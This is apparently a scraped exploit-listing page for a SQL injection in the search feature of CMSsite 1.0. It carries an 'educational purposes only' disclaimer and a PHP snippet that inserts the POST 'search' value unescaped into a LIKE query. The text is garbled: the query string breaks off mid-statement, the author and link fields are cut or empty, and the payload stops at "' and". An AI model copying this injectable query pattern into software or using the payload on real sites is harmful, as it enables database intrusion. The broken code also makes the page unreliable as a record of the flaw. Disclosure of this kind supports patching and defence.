Cmssite 1.0 search sql injection Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-01-28 | Type : webapps | Platform : php
This exploit / vulnerability Cmssite 1.0 search sql injection is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: CMSsite 1.0 - 'search' SQL injection
# Exploit Author : Majid kalantari (
# Date: 2019-01-27
# Vendor Homepage :
# Software link:
# Version: 1.0
# Tested on: Windows 10
# CVE: N/A

# vulnerable file: search.php
# vulnerable parameter : POST - search

if (isset($_POST['submit'])) {
$search = $_POST["search"];
$query = "SELECT * FROM posts WHERE post_tags LIKE '%$search%' AND
$search_query = mysqli_query($con, $query);

# payload on search text box: ' and
